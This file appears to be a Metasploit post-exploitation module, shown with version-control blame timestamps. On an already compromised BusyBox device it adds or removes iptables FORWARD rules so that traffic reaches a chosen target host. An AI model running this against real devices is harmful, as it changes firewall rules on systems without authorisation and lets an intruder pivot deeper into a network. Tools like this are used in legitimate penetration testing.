2015-08-10 18:29:41 +02:00
|
|
|
##
|
2017-07-24 06:26:21 -07:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2015-08-10 18:29:41 +02:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
|
|
|
|
|
2016-03-08 14:02:44 +01:00
|
|
|
class MetasploitModule < Msf::Post
|
2015-08-10 18:29:41 +02:00
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
|
super(
|
2015-08-28 10:43:09 -05:00
|
|
|
'Name' => 'BusyBox DMZ Configuration',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module will be applied on a session connected to a BusyBox shell. It allows to manage
|
|
|
|
|
traffic forwarding to a target host through the BusyBox device.
|
|
|
|
|
},
|
2015-08-10 18:29:41 +02:00
|
|
|
'Author' => 'Javier Vicente Vallejo',
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Platform' => ['linux'],
|
2015-08-28 10:43:09 -05:00
|
|
|
'SessionTypes' => ['shell']
|
2015-08-10 18:29:41 +02:00
|
|
|
)
|
|
|
|
|
|
|
|
|
|
register_options([
|
2015-08-28 10:43:09 -05:00
|
|
|
OptAddress.new('TARGET_HOST', [ true, 'The address of the target host']),
|
|
|
|
|
OptBool.new('DELETE', [true, 'Remove host from the DMZ, otherwise will add it', false])
|
2017-05-03 15:42:21 -05:00
|
|
|
])
|
2015-08-10 18:29:41 +02:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def run
|
2015-08-28 10:43:09 -05:00
|
|
|
if datastore['DELETE']
|
|
|
|
|
print_status("Deleting #{datastore['TARGET_HOST']} from DMZ")
|
|
|
|
|
vprint_status(cmd_exec("iptables -D FORWARD -d #{datastore['TARGET_HOST']} -j ACCEPT"))
|
2015-08-10 18:29:41 +02:00
|
|
|
else
|
2015-08-28 10:43:09 -05:00
|
|
|
print_status("Adding #{datastore['TARGET_HOST']} to DMZ")
|
|
|
|
|
vprint_status(cmd_exec("iptables -A FORWARD -d #{datastore['TARGET_HOST']} -j ACCEPT"))
|
2015-08-10 18:29:41 +02:00
|
|
|
end
|
2015-08-28 10:43:09 -05:00
|
|
|
|
|
|
|
|
vprint_status(cmd_exec('iptables --list'))
|
2015-08-10 18:29:41 +02:00
|
|
|
end
|
|
|
|
|
end
|
